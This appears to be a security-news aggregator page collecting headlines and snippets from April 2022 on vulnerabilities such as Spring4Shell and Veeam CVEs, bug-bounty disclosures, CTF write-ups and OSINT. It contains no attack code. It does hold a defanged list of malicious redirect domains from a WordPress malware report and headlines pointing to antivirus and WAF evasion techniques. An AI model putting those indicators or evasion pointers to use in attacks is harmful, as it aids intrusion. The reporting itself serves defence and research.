    作者:王铁磊 原文链接:https://mp.weixin.qq.com/s/Lj8c5PLzLGIfdBoDzairsQ 1 引言 虚拟内存 (Virtual Memory, VM) ⼦系统是现代操作系统基础核⼼组件,不仅负责虚拟地址和物理内存的映射关系,管理调度物理内存的使⽤,为程序开发提供统⼀透明的地址空间,同时也要为不同执⾏环境提供隔离,管控物理页⾯读、写、执⾏等权限,是系统安全的基...
    CVE-2022-26503 Veeam Agent for Microsoft Windows LPE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-26503-veeam-agent-for-microsoft-windows-lpe/ 继上文 漏洞分析 补丁 Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTc...
    CVE-2022-26500 Veeam Backup & Replication RCE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-26500-veeam-backup-replication-rce/ 看推特又爆了cve,感觉挺牛逼的洞,于是分析一手。 官方公告 https://www.veeam.com/kb4288 The Veeam Distribution Service (TCP 9380 by default) all...
  • Open

    XNU 虚拟内存安全往事
    作者:王铁磊 原文链接:https://mp.weixin.qq.com/s/Lj8c5PLzLGIfdBoDzairsQ 1 引言 虚拟内存 (Virtual Memory, VM) ⼦系统是现代操作系统基础核⼼组件,不仅负责虚拟地址和物理内存的映射关系,管理调度物理内存的使⽤,为程序开发提供统⼀透明的地址空间,同时也要为不同执⾏环境提供隔离,管控物理页⾯读、写、执⾏等权限,是系统安全的基...
    CVE-2022-26503 Veeam Agent for Microsoft Windows LPE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-26503-veeam-agent-for-microsoft-windows-lpe/ 继上文 漏洞分析 补丁 Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTc...
    CVE-2022-26500 Veeam Backup & Replication RCE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-26500-veeam-backup-replication-rce/ 看推特又爆了cve,感觉挺牛逼的洞,于是分析一手。 官方公告 https://www.veeam.com/kb4288 The Veeam Distribution Service (TCP 9380 by default) all...

  • Open

    WordPress Popunder Malware Redirects to Scam Sites
    Over the last year we’ve seen an ongoing malware infection which redirects website visitors to scam sites. So far this year our monitoring has detected over 3,000 websites infected with this injection this year and over 17,000 in total since we first detected it in March of 2021. The reported behaviour is always the same: After a few seconds of loading, the website will redirect to a dodgy scam site. Checking the Payload The malware is always injected into the active theme’s footer.php file, and contains obfuscated JavaScript after a long series of empty lines, no doubt trying to stay hidden: Once we de-obfuscate this we see the following excerpt of the malicious code: The attackers are frequently adjusting the injection ever so slightly, but we notice the same domains over and over again initiating the redirect: amads[.]fun techmarket[.]ink uads[.]shop 5[.]188[.]62[.]157 uads[.]live like-a-dating[.]top techmarket[.]ink Source of Infection? Continue reading WordPress Popunder Malware Redirects to Scam Sites at Sucuri Blog.
  • Open

    LayerZero Security Update — April 2022
    If this past week has shown us anything, it’s that there is nothing more critical in this space than an absolute commitment to… Continue reading on LayerZero Official »
    Community-Owned Bug Bounties
    Hacks have become the new norm in crypto; from Twitter jokes about getting rugged, to sad posts about people losing their most prized… Continue reading on Medium »
    Small bugs are more dangerous than you think
    Chaining bugs for the win Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 2
    Hello Everyone, I hope you liked our previous article that was Cross-Site-Scripting (XSS) — Part 1, On that article, you learned about… Continue reading on Medium »
    My First RCE from N/A to Triaged (CVE-2021–3064)
    hello hackers, my name is Vivek Kumar & I started my bug bounty journey 8 months ago lets get back to the RCE its gonna very shot blog… Continue reading on Medium »
    Enter the Crow Games for the opportunity to earn NFTs!
    Complete some tasks, tell us about it, and join the Crow Clan!  After our recent airdrop of the crow clan NFT we have decided to grow the… Continue reading on Medium »
    Ambassador World Cup 2022 CTF
    This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. Continue reading on Medium »
  • Open

    Workspace configuration metadata disclosure
    Slack disclosed a bug submitted by kadusantiago: https://hackerone.com/reports/864489 - Bounty: $3500
    Subdomain Takeover on proxies.sifchain.finance pointing to vercel
    Sifchain disclosed a bug submitted by hrdfrdh: https://hackerone.com/reports/1487793 - Bounty: $100
    CVE-2022-24288: Apache Airflow: TWO RCEs in example DAGs
    Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1492896 - Bounty: $4000
  • Open

    Ukraine — Point de situation au 2 avril
    Les dernières 24h Continue reading on Medium »
    Create Your Own Internet Archive — ArchiveBox
    Since 1996, Internet Archive is actively serving the purpose. What does it do? I keeps an archive of the things that were once found on… Continue reading on Medium »
    War in Ukraine / March 30
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Logging network users in OSINT
    Logging or establishing information about the device and connection of an Internet user is an important part of the process of… Continue reading on Medium »
    Telltale Signs of Russian Disinformation
    A wave of #disinformation emerged since Russia invaded Ukraine. Part 1 of a guide on how to take examples apart with #OSINT Continue reading on Medium »
    PGP genel anahtarlarından bilgi nasıl çıkarılır
    Bu yazıda PGP genel anahtarından nasıl bilgi çıkarılacağı hakkında konuşacağız. Continue reading on Medium »
    Find users by password and PGP key
    Today we’ll talk about how to identify an anonymous email user using a leaked password from it, as well as a PGP public key. Continue reading on Medium »
  • Open

    CVE-2017-16995 Ubuntu本地提权测试(任意地址读写利用)
    该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。
    lazysysadmin 靶场
    今天继续打靶场,这个靶场不难,但是我花了一天的时间,感觉被作者骗了。
    漏洞随笔:通过 Jet Protocol 任意提款漏洞浅谈 PDA 与 Anchor 账号验证
    目前在 Solana 上发生过多起黑客攻击事件均与账号校验问题有关,慢雾安全团队提醒广大 Solana 开发者,注意对账号体系进行严密的审查。
    FreeBuf早报 | 俄罗斯利用AcidRain攻击美国ViaSat;Wyze摄像头漏洞可访问视频源
    SentinelLabs 研究人员发现,美国卫星通信服务提供商 Viasat 遭受了一轮网络攻击,结果导致中东欧地区的服务出现了中断。
    创宇区块链|三月安全月报
    三月安全事件数量之多,创下2022开年新高,造成超 7 亿美元损失令人震惊!
    Driftingblues-1靶机渗透详细过程
    Driftingblues-1靶机渗透详细过程分享学习。
    Java 反序列化回显链研究:漏洞检测工程化
    Java 反序列化回显链研究:漏洞检测工程化学习分享。
    匿名者声称入侵了俄罗斯 Thozis 公司,未对 Rosaviatsia 发动攻击
    匿名者黑客组织(Anonymous)持续对俄罗斯实体和在该国运营的外国私营企业进行网络攻击。
    苹果发布紧急补丁以修复被积极利用的零日漏洞
    近日,苹果发布了一个紧急安全补丁,以解决两项被积极利用以入侵iPhone、iPad和Mac的零日漏洞。
    WAFNinja:一款绕过WAF的渗透测试工具
    在我们平时做渗透测试的时候,难免会遇到各种WAF的阻挡。
    FreeBuf周报 |Meta雇佣公司攻击TikTok引发数据隐私担忧;Spring漏洞补丁已更新
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!热点资讯1、国家信息安全漏洞共享平台收录Spring框架远程命令执行漏洞,安全补丁更新2、Facebook因算法漏洞连推糟糕内容,一直持续半年3、《华盛顿邮报》长文批评Meta雇佣公司攻击TikTok,引发数据隐私担忧4、WordPress网站被黑,利
    《信息安全技术 基于密码令牌的主叫用户可信身份鉴别技术规范》等征求意见稿发布
    四项国家标准的征求意见稿已经发布,面向全国公开征求意见。
    某厂2016实习招聘安全技术试题答案及解析
    鉴于曾经做过腾讯找招聘-安全技术笔试题目,故留此一记,以作怀念。
    OpenSSL 无限循环漏洞影响威联通 NAS 设备
    该漏洞如果被利用,将允许攻击者进行拒绝服务攻击。
    FBI调查了100多种勒索软件变体
    美联邦调查局(FBI)对100多种不同的勒索软件变体发起调查,发现其中很多已被用于各类勒索软件活动中。
    FreeBuf早报 | CNVD收录Spring 漏洞,补丁发布;Facebook算法漏洞持续半年
    3月30日,国家信息安全漏洞共享平台(CNVD)收录了Spring框架远程命令执行漏洞(CNVD-2022-23942)。
  • Open

    AD Series | DC Sync Attacks
    DCSync Attack is a type of “credential dumping” attack that makes use of commands present in Microsoft Directory Replication Service… Continue reading on Medium »
    Prologue to Red Hat hackers in Cyber Security
    What are Red hat hacker or Red Team? Continue reading on Medium »
    HackTheBox Delivery Writeup
    Hello, i want share how i solve Hackthebox Delivery box. this box is fun and easy Continue reading on MII Cyber Security Consulting Services »
    HackTheBox Ready Writeup
    Hello, i want to share how i solve HackTheBox Ready machine. this box is kind need more research to analyze and fun. Continue reading on MII Cyber Security Consulting Services »
    HackTheBox — ScriptKiddie Writeup
    Langkah pertama yang harus dilakukan adalah dengan melakukan nmap untuk mengetahui port yang terbuka, karena IP address 10.10.10.226 tidak… Continue reading on MII Cyber Security Consulting Services »
    HackTheBox — Passage Writeup
    IP : 10.10.10.26 Continue reading on MII Cyber Security Consulting Services »
  • Open

    CVE 2022-22965 (Spring4Shell) Vulnerability
    On March 29, 2022, a security researcher with the handle p1n93r disclosed a Spring Framework remote code execution (RCE) vulnerability, which was archived by vx-underground. This vulnerability, known as Spring4Shell, affects applications that use JDK v9 or above that run Apache Tomcat as the Servlet Container in a WAR package and use dependencies of the... The post CVE 2022-22965 (Spring4Shell) Vulnerability appeared first on TrustedSec.
  • Open

    SecWiki News 2022-04-01 Review
    Chrome Zero-Day from North Korea by ourren 【Rootkit 系列研究】Windows 平台的高隐匿、高持久化威胁 by ourren 基于 OpenAFS 文件系统的反射攻击深度分析 by ourren 关于如何更好地呈现红蓝对抗价值的思考 by ourren 使用DNS Tunnel技术的Linux后门B1txor20正在通过Log4j漏洞传播 by ourren 商业数字证书签发和使用情况简介 by ourren Spring Cloud Function SpEL表达式注入 by ourren CodeQl 从0到0.1 by ourren codeql挖掘java二次反序列化 by ourren K8s安全入门学习扫盲贴 by ourren Malbox: 恶意软件容器靶机 by ourren 《深入理解CodeQL》Finding vulnerabilities with CodeQL. by ourren 使用 CodeQL 分析 AOSP by ourren Java内存马分析集合 by ourren CVE-2021-29454—Smarty模板注入分析复现 by ourren 机器学习系统:设计和实现 by ourren 混合办公(Hybrid Work)安全的“三年”技术落地趋势推演 by ourren LAPSUS$安全攻击的胡乱分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-01 Review
    Chrome Zero-Day from North Korea by ourren 【Rootkit 系列研究】Windows 平台的高隐匿、高持久化威胁 by ourren 基于 OpenAFS 文件系统的反射攻击深度分析 by ourren 关于如何更好地呈现红蓝对抗价值的思考 by ourren 使用DNS Tunnel技术的Linux后门B1txor20正在通过Log4j漏洞传播 by ourren 商业数字证书签发和使用情况简介 by ourren Spring Cloud Function SpEL表达式注入 by ourren CodeQl 从0到0.1 by ourren codeql挖掘java二次反序列化 by ourren K8s安全入门学习扫盲贴 by ourren Malbox: 恶意软件容器靶机 by ourren 《深入理解CodeQL》Finding vulnerabilities with CodeQL. by ourren 使用 CodeQL 分析 AOSP by ourren Java内存马分析集合 by ourren CVE-2021-29454—Smarty模板注入分析复现 by ourren 机器学习系统:设计和实现 by ourren 混合办公(Hybrid Work)安全的“三年”技术落地趋势推演 by ourren LAPSUS$安全攻击的胡乱分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    ZAP Structural Modifier
    저는 취약점을 찾을 때 중요한 3가지를 뽑으라고 한다면 아마도 기술에 대한 이해, 대상에 대한 이해, 그리고 센스를 택할 것 같습니다. 물론 이외에도 중요한 요소들은 정말 많겠지만 이 3가지는 일할 때 가장 많이 느끼는 부분이였어요. 갑자기 이런 이야기를 하는건 오늘 주제가 대상에 대한 이해와 연관이 깊기 때문입니다. ZAP에 관련된 부분이지만, Burp 사용자도 충분히 영감을 얻어가실 수 있을거라 생각이 드네요. ZAP Structural Modifier 입니다. 그럼 시작하죠 🚀 Structural Modifier ZAP은 Site Tree의 구조를 수정할 수 있는 Structural Modifier 란 기능을 지원하고 있습니다.
  • Open

    Critical Gitlab vulnerability let attackers take over accounts
    Article URL: https://www.bleepingcomputer.com/news/security/critical-gitlab-vulnerability-lets-attackers-take-over-accounts/ Comments URL: https://news.ycombinator.com/item?id=30878924 Points: 197 # Comments: 36
    Report a security vulnerability as an ethical hacker
    Article URL: https://opencirt.com/hacking/report-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30877585 Points: 1 # Comments: 1
  • Open

    Hunting for Malicious Binaries and Backdoors in the Running Containers
    submitted by /u/tbhaxor [link] [comments]
  • Open

    is PSP to be very worried?
    there are a lot of suspects about AMD putting backdoors on their chips and its concerning a lot of people. they are a security problem and cant be mitigated. my question is for people with actual knowledge: i want more information about the risks. i know it has full write/read access, it can see everything on the pc and it can be "remotely" manipulated. note on remotely, it can mean many things. ​ does it collect any data in a telemetry fashion or was it reported to ping weird IPs? does remote control need to be manually activated, or its permanently active by default? could it have any way to not depend on internet like sending info via radio? ​ And essentially: its suspected to be made for targeted attacks or global surveillance? it's essentially a backdoor on every modern computer so i cant be calm about it. this could be used for literally anything but few people knows what. this is why i ask here: to see if someone with knowledge can give info about this threat. i am extremely cautious about privacy, which overlaps with security, and i thought this can be a direct compromise. one of my highest goals is reducing the amount of data sent to corps. my threat model focuses more on data-hungry corps and services which want to know every detail about you and potentially have direct impact over you. i do nothing illegal and live in a democratic EU country (poland), and i am no one important enough to be individually targeted. so i asked because i dont really feel much a risk being finger pointed by agencies, but i am about mass surveillance methods that affect every computer on the world. PSP knowing absolutely all my pc activity is a no-no. submitted by /u/gre4tynhrj [link] [comments]
    Non-DNS or Non-Compliant DNS traffic on DNS port in UniFi UDM IPS
    I have been seeing this error "ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Reserved Bit Set" almost twice or three times a day. source: 192.168.107.92 : 49013 (port changes when alert is triggered) destination: 1.1.1.1 : 53 or sometimes 8.8.8.8 : 53 (my upstream dns in pihole) I have been trying my best to figure this one out but with no luck, could anyone please help or guide me on how to investigate this alert? some details: old_phone 192.168.107.79 new_phone 192.168.107.204 pihole_dns 192.168.107.92 I have started seeing this error a while back after enabling IPS, every time the source is my pihole which is used as a DNS for all network devices, when I try to match the traffic in pihole with the time the alert is triggered in UDM I always saw the same device "old_pho…
    Volunteer pentest/bug hunt program
    Hi! I am currently looking into possibilities to set up a volunteer pentest agreement or program. I am volunteering for a NGO which helps refugees and they like to get a pentest for their website. At first I thought thats a no brainer - just set up a profile at a bug bounty site. But thats not so easy, e.g. bugcrowd dows not allow complete private programs and minimum 20$ rewards. We would like to keep legal costs to a minimum and wanted to avoid hiring a attorney to set up contracts, if there are other possibilies. We already have volunteering pentester, they just wait for the legal green light to start. Any recommendations on that? submitted by /u/iiskierka [link] [comments]
    Spring4Shell Detection
    https://github.com/west-wind/Spring4Shell-Detection ​ If any other ways to detect, please comment and let everybody know. submitted by /u/la_farfalla_ [link] [comments]
    Vulnerability Research or SOC?
    I'm about to graduate with my degree in Computer Science, with very minimal experience in cybersecurity. Right now it seems as though I may be given to opportunity to work either as a vulnerability researcher or as a SOC analyst, both junior roles where my respective seniors would help me figure things out as I transitioned into these roles. Which would you recommend as a first-experience career choice to start off with in cybersecurity? submitted by /u/justaguybye [link] [comments]
  • Open

    Resources Search Engine for Infosec based on Ippsec.rocks
    submitted by /u/sarthaksaini [link] [comments]
    Gaining code execution on the backend of the PEAR package manager
    submitted by /u/monoimpact [link] [comments]
    How Go Mitigates Supply Chain Attacks
    submitted by /u/e-san55 [link] [comments]
    SpringShell Zero-Day Vulnerability: All You Need To Know
    submitted by /u/SRMish3 [link] [comments]
  • Open

    Passive-aggressive scan checks
    Here at PortSwigger, our goal is to enable the world to secure the web. Our scanner sits at the core of this value - quickly surfacing issues and vulnerabilities that may be present in a web applicati
  • Open

    Passive-aggressive scan checks
    Here at PortSwigger, our goal is to enable the world to secure the web. Our scanner sits at the core of this value - quickly surfacing issues and vulnerabilities that may be present in a web applicati
  • Open

    Finding bugs that doesn’t exists
    No content preview
  • Open

    Finding bugs that doesn’t exists
    No content preview
  • Open

    Finding bugs that doesn’t exists
    No content preview
  • Open

    Spring has sprung: breaking down CVE-2022-22963/CVE-2022-22965)
    Article URL: https://www.fastly.com/blog/spring-has-sprung-breaking-down-cve-2022-22963-and-spring4shell-cve-2022 Comments URL: https://news.ycombinator.com/item?id=30874271 Points: 1 # Comments: 0

  • Open

    GitLab Critical Security Release: 14.9.2, 14.8.5, and 14.7.7
    submitted by /u/0xmilan [link] [comments]
    Critical Vulnerability in Spring Core: CVE-2022-22965 a.k.a. Spring4Shell
    submitted by /u/MiguelHzBz [link] [comments]
    IDA plugin for finding constants used in conditional statements
    submitted by /u/Martypx00 [link] [comments]
    Conti-nuation: methods and techniques observed in operations post the leaks
    submitted by /u/digicat [link] [comments]
    GitHub Cache Poisoning
    submitted by /u/BarakScribe [link] [comments]
    SpringShell Detector - searches compiled code (JAR/WAR binaries) for potentially vulnerable web apps
    submitted by /u/SRMish3 [link] [comments]
    Pwning 3CX Phone Management Backends from the Internet
    submitted by /u/EnableSecurity [link] [comments]
    Spring4Shell 0-day writeup and guidance
    submitted by /u/CraZyBob [link] [comments]
  • Open

    CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell)
    CVE-2022-22965, aka SpringShell, is a remote code execution vulnerability in the Spring Framework. We provide a root cause analysis and mitigations. The post CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) appeared first on Unit42.
  • Open

    Path of least Resistance
    Hello! I am a student finishing my masters in computer engineering and I also work as a consultant, doing DevOps and cloud infrastructure management. I am really interested in Cyber and have focused my masters around security and Networking. I have also done some free online courses on Cyber security. I am trying to pitch to my superiors the idea of providing cyber security services to your clients, but science we do not have a cyber team, I was thinking which area of cyber would be the one that would be the "easiest" to start offering. submitted by /u/Ap0k4lips3 [link] [comments]
    What do you guys think about SSL ?
    Do you think letsencrypt auto 3 month renewal ( with certbot) is worth it or do I buy comodo or digital cert ? I am starting my own cybersecurity company as a contractor LLC, and will be building a website also using an email based on that email, can i use the SSL certificate for both ? submitted by /u/Morpheus_mmg [link] [comments]
    PoC available for CVE's
    Is there someplace where CVE's have a poc available status? I looked at exploitdb but they don't have anything for the spring vuln and I'm wanting something that updates faster than that. edit: I look at https://cvetrends.com/ and when a new cve bubbles to the top. I would like to know if a poc has been released for it. submitted by /u/rogueit [link] [comments]
    USB WiFi with external antenna attachment, usable on Linux?
    What are decent USB WiFi devices that allow attaching an external antenna, that can also run in monitor mode on Linux? I'd like to try the aircrack-ng attacks on my home network, which includes a number of Wireless Access Points. I've got a TP-LINK TL-WN722N, but I think it isn't capable of doing the 5Mhz channels, which I'd like to try out. I don't have any Windows machines. submitted by /u/bediger4000 [link] [comments]
    Deciding between Varonis and Digital Guardian
    I'm in an org with a decent budget for tools yet am the only infosec analyst on staff so limited time to spend on them. We currently have both Varonis and Digital Guardian deployed though not fully leveraging either of them, and from a value perspective it may not make sense to renew them both as it currently stands. In my limited experience with them I see a lot of overlap with some unique characteristics for each, like the DG agent on endpoints being able to take a block action on data, versus some fairly nice behavior analysis through Varonis on user and group access with recommendations. Anyone familiar with either or both of these products have insights on how well they compliment each other or if one can mostly supplant the other? submitted by /u/EnterNam0 [link] [comments]
    Internet facing host(hypervisor) to secure question - setup
    I thinked about a setup to maximize a physical host usage by running Proxmox(hypervisor) on an internet facing machine. The hypervisor os would have 2 NICs: eth0 configured with an internal IP v4(for management purposes) and eth1(internet facing adapter) will have no ip(v4 or v6) configured on the hypervisor os(present only to be attached to the router VM). eth1 will be attached only to the router VM(pfsense) which will also have another vNIC bridged to the internal network for obvious reasons. What issues/risks do you think this setup poses and how to secure this? This obviously will be only a home lab setup not for a business etc Thank you! submitted by /u/j0hnnyrico [link] [comments]
    I think my neighbor is spamming my wifi router with deauth packets
    Title. Ive been getting kicked off my wifi at night, for 3 days straight, how can i confirm this so i can go to the police? I have a 802.xx device with aircrackng. submitted by /u/Far-Veterinarian9464 [link] [comments]
    Do I need an antivirus with iOS ?
    Most of the AV’s doesn’t offer what they offer on Android as iOS has already built in security features that doesn’t let AV’s function essentially. submitted by /u/jigjagascrp4 [link] [comments]
    Which should I choose ? @gmail.com - @outlook.com - @icloud.com
    Not talking about apps just domains (as I’m gonna use Apple Mail anyway), which one should I choose when creating an email address ? submitted by /u/jigjagascrp4 [link] [comments]
  • Open

    【安全通报】Spring Framework 远程命令执行漏洞(CVE-2022...
    近日,Spring 官方 GitHub issue中提到了关于 Spring Core 的远程命令执行漏洞,该漏洞广泛存在于Spring 框...
  • Open

    【安全通报】Spring Framework 远程命令执行漏洞(CVE-2022...
    近日,Spring 官方 GitHub issue中提到了关于 Spring Core 的远程命令执行漏洞,该漏洞广泛存在于Spring 框...
  • Open

    Information Leakage via TikTok Ads Web Cache Deception
    TikTok disclosed a bug submitted by arifmkhls: https://hackerone.com/reports/1484468 - Bounty: $200
    Stored XSS in merge request creation page through payload in approval rule name
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1342009 - Bounty: $3000
    IDOR: leak buyer info & Publish/Hide foreign comments
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1410498 - Bounty: $1250
    Stored XSS in Question edit from product name
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1416672 - Bounty: $500
    stored XSS on AliExpress Review Importer/Products when delete product
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1425882 - Bounty: $500
    Stored XSS in Question edit for product name (bypass #1416672)
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1428207 - Bounty: $500
  • Open

    Gitlab – Static passwords set during OmniAuth-based registration (CVE-2022-1162)
    Article URL: https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/ Comments URL: https://news.ycombinator.com/item?id=30872415 Points: 8 # Comments: 0
    A Technical Analysis of How Spring4Shell (CVE-2022-22965) Works
    Article URL: https://www.extrahop.com/company/blog/2022/a-technical-analysis-of-how-spring4shell-works/ Comments URL: https://news.ycombinator.com/item?id=30870453 Points: 12 # Comments: 6
    Rust Open Source CVE Search Engine
    Article URL: https://github.com/Exein-io/kepler Comments URL: https://news.ycombinator.com/item?id=30866901 Points: 1 # Comments: 0
    Future-Proofing SaltStack ( CVE 2022-22934 2022-22935 2022-22936 )
    Article URL: https://blog.cloudflare.com/future-proofing-saltstack/ Comments URL: https://news.ycombinator.com/item?id=30866784 Points: 3 # Comments: 0
  • Open

    Cross-Site Scripting (XSS) via image rendering application
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be… Continue reading on Medium »
    80+ million Digilocker user’s phone numbers exposed [Fixed]
    This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute… Continue reading on Medium »
    Hats Protocol Economics — Part I
    Long-term sustainability and token utility Continue reading on Medium »
    CloudSek EWYL 2022 CTF
    Solving a Harry Potter Themed CTF Continue reading on InfoSec Write-ups »
  • Open

    Website OSINT
    No content preview
    Detecting malware packages in GitHub Actions
    No content preview
    CloudSek EWYL 2022 CTF
    No content preview
  • Open

    Website OSINT
    No content preview
    Detecting malware packages in GitHub Actions
    No content preview
    CloudSek EWYL 2022 CTF
    No content preview
  • Open

    Website OSINT
    No content preview
    Detecting malware packages in GitHub Actions
    No content preview
    CloudSek EWYL 2022 CTF
    No content preview
  • Open

    Spring Remote Code Execution Vulnerability
    Article URL: https://talktotheduck.dev/spring-remote-code-execution-vulnerability Comments URL: https://news.ycombinator.com/item?id=30871886 Points: 12 # Comments: 1
    Vulnerability in the Combined Charging System for Electric Vehicles
    Article URL: https://www.brokenwire.fail/ Comments URL: https://news.ycombinator.com/item?id=30867098 Points: 2 # Comments: 0
    New Spring4Shell Zero-Day Vulnerability What it is and how to be prepared
    Article URL: https://www.contrastsecurity.com/security-influencers/new-spring4shell-vulnerability-confirmed-what-it-is-and-how-to-be-prepared Comments URL: https://news.ycombinator.com/item?id=30865001 Points: 2 # Comments: 0
  • Open

    Exploring a New Class of Kernel Exploit Primitive
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    XSS Vulnerability Part 1
    Greetings, in this article I want to describe the XSS vulnerability in detail. Continue reading on Medium »
    REFLECTED XSS IN DEPED.GOV.PH BY NEUCHI
    |Hello Infosec Community Continue reading on Medium »
  • Open

    Website OSINT
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques and tools to gather information about several websites and… Continue reading on InfoSec Write-ups »
    How to clean a smartphone that fell into the wrong hands?
    Let’s talk about the safety of your smartphone in cases where it has fallen or is about to fall into the wrong hands. Firstly, the regular… Continue reading on Medium »
    Ukraine — Point de situation au 1er avil
    Les dernières 24h Continue reading on Medium »
    TryHackMe: Content Discovery Writeup
    This room aims to teach the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities… Continue reading on Medium »
    War in Ukraine / March 30
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    9 reliable and free OSINT tools
    Maltego (https://www.maltego.com/) is one of the best data visualization and investigation automation systems in the world. Used even by… Continue reading on Medium »
    Identification of cryptocurrency wallets
    Let’s talk about the identification of cryptocurrency wallets. Continue reading on Medium »
    Deanonymization of a Skype profile
    Today I will tell you about the deanonymization of a Skype profile. It is appropriate to start researching a Skype profile by trying to… Continue reading on Medium »
  • Open

    SEC Filings for Nova Scotia Bank
    Hi All. Interesting one, may or may not been posted before. Probably publicly avail. https://www.sec.gov/Archives/edgar/data/9631/000114036122011592 submitted by /u/Stan464 [link] [comments]
  • Open

    Chrome 101: Federated Credential Management Origin Trial, Media Capabilities for WebRTC, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 101 is beta as of March 31, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Reduce User Agent String Information Chrome is trying to reduce the amount of information the user agent string exposes in HTTP requests as well as in navigator.userAgent, navigator.appVersion, and navigator.platform. We're doing this to prevent the user agent string from being used for passive user fingerprinting. To join the origin trial, see its entry on Chrome Origin Trials. See the end of this article for…
    What to Expect from Privacy Sandbox Testing
    We’re excited to share that Chrome is starting the next stage of testing for the Privacy Sandbox ads relevance and measurement proposals. Starting today, developers can begin testing globally the Topics, FLEDGE, and Attribution Reporting APIs in the Canary version of Chrome. We’ll progress to a limited number of Chrome Beta users as soon as possible. Once things are working smoothly in Beta, we’ll make API testing available in the stable version of Chrome to expand testing to more Chrome users. We recognize that developers will need some time to use the APIs, validate the data flows, and measure performance. We are looking forward to companies providing feedback as they move through the different testing phases, which will allow us to continually improve the APIs. Once we’re confident that…
  • Open

    SecWiki News 2022-03-31 Review
    CodeQL 踩坑指南 - Java by ourren CodeQL 提升篇之路由收集 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-31 Review
    CodeQL 踩坑指南 - Java by ourren CodeQL 提升篇之路由收集 by ourren 更多最新文章,请访问SecWiki
  • Open

    Ajax Spidering 시 브라우저 엔진 별 성능 비교 🏁
    ZAP의 AjaxSpider는 headless browser를 통해서 직접 브라우징하며 Spidering 하는 기능입니다. 기본적으로는 Firefox가 설정되어 있지만, 개인의 취향에 따라 Chrome, PhantomJS 등 여러가지 browser(headless or common)를 사용할 수 있습니다. 갑자기 궁금해졌습니다. 과연 누가 제일 빠르고 많이 잡아올까? 그래서 비교해보기로 마음먹었죠. TLDR firefox: Found 675 URLs chrome: Found 382 URLs phantomjs: Found 340 URLs How to test 방법은 간단합니다. Security Crawl Maze 를 대상으로 AjaxSpidering을 진행하며 이 때 수집된 URL의 수를 비교합니다.
    Cullinan
    Cullinan is a wiki for hacking/security/bugbounty Cullinan is an wiki and cheatsheet page for hacking/security/bugbounty. It covers definitions of common vulnerabilities, testing methods, bypass techniques, and countermeasures, as well as tools and tutorials. If you have a good idea or additional comments about the page, please send me(@hahwul) a tweet. 컬리넌은 해킹/보안/버그바운티 등 전반적인 AppSec에 대한 위키 및 치트시트입니다. 보편적인 취약점에 대한 정의, 테스팅 방법, 우회 기법 및 대응방안에 대해 다루며, 도구의 사용 방법이나 튜토리얼 또한 포함합니다.
  • Open

    HomeGrown Red Team: Let’s Evade AV And Run Lazagne
    What is Lazagne? Continue reading on Medium »
    SnapAttack Launches Community Edition to Drive Collaboration Across Cybersecurity Community
    Company launches free of charge platform providing access to a vast library of attack and detection content, including the latest threats… Continue reading on SnapAttack »
  • Open

    Collecting artefacts from a windows/Linux system using SSH remote connection
    I want to know how I can use SSH to connect remotely to a windows or Linux system and access the artefacts(event logs, register key, files, timestamps) of the system and save them to the system I'm connection from. submitted by /u/EzraSC [link] [comments]
  • Open

    7月1日起施行,《重庆市数据条例》正式发布
    《条例》分为总则、数据处理和安全、数据资源、数据要素市场、发展应用、区域协同、法律责任等8章,60条。
    从0到1完全掌握目录遍历漏洞
    目录遍历漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露。
    FreeBuf甲方群话题讨论 | 聊聊疫情期间企业网络安全
    远程使用公司派发的装有相关安全工具的电脑,能够起到多大的安全防护作用?企业的应该如何构建身份验证机制来确保安全?
    从0到1完全掌握 SQL 注入
    <h1 data-nodeid="4292" class="">从0到1完全掌握 SQL 注入</h1><ul data-node
    脑机接口技术调研报告
    脑机接口是指在大脑与外部设备之间创建的直接连接,实现脑与外部设备之间的信息交换。其工作流程包括脑电信号的采集和获取、信号处理、信号的输出和执行,最终再将信号反馈给大脑。
    CISA和DoE联合警告,小心针对联网UPS设备的网络攻击
